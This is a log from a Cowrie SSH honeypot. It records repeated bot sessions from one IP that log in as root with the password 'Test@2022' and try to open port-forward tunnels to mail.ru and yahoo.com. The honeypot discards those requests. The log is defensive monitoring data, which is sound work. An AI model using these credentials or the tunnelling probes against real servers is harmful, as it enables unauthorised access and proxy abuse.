{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.430224Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.480997Z","src_ip":"77.83.207.83","session":"3de593ceea67"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56156,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c9d87a15906","protocol":"ssh","message":"New connection: 77.83.207.83:56156 (1.2.3.4:22) [session: 4c9d87a15906]","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.530702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.531655Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.581600Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.831213Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16598,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16598","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.882194Z","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:34.932274Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":17755,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17755","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.072577Z","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.122714Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":629,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:629","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.264438Z","session":"4c9d87a15906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.314469Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.365453Z","src_ip":"77.83.207.83","session":"4c9d87a15906"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56251,"dst_ip":"1.2.3.4","dst_port":22,"session":"960c9c93664c","protocol":"ssh","message":"New connection: 77.83.207.83:56251 (1.2.3.4:22) [session: 960c9c93664c]","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.413509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.424091Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.463418Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.710361Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23774,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23774","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.760607Z","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.810178Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":17299,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17299","sensor":"my-vps","timestamp":"2025-08-31T03:46:35.951988Z","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.001694Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17808,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17808","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.143913Z","session":"960c9c93664c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.193387Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.243952Z","src_ip":"77.83.207.83","session":"960c9c93664c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56350,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d027bcbf7b1","protocol":"ssh","message":"New connection: 77.83.207.83:56350 (1.2.3.4:22) [session: 3d027bcbf7b1]","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.293760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.294605Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.345156Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.595161Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29271,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29271","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.646213Z","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.696412Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17368,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17368","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.840780Z","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:36.891098Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":1140,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1140","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.032674Z","session":"3d027bcbf7b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.082821Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.134183Z","src_ip":"77.83.207.83","session":"3d027bcbf7b1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56440,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ec5ff4f98d4","protocol":"ssh","message":"New connection: 77.83.207.83:56440 (1.2.3.4:22) [session: 6ec5ff4f98d4]","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.183745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.192961Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.234562Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.486428Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31277,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31277","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.537945Z","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.588629Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":10307,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10307","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.732851Z","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.783536Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":17102,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17102","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.928916Z","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:37.979660Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.030806Z","src_ip":"77.83.207.83","session":"6ec5ff4f98d4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56531,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eebd1e3277f","protocol":"ssh","message":"New connection: 77.83.207.83:56531 (1.2.3.4:22) [session: 5eebd1e3277f]","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.079245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.089076Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.129539Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.378923Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3093,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3093","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.429778Z","session":"5eebd1e3277f"}
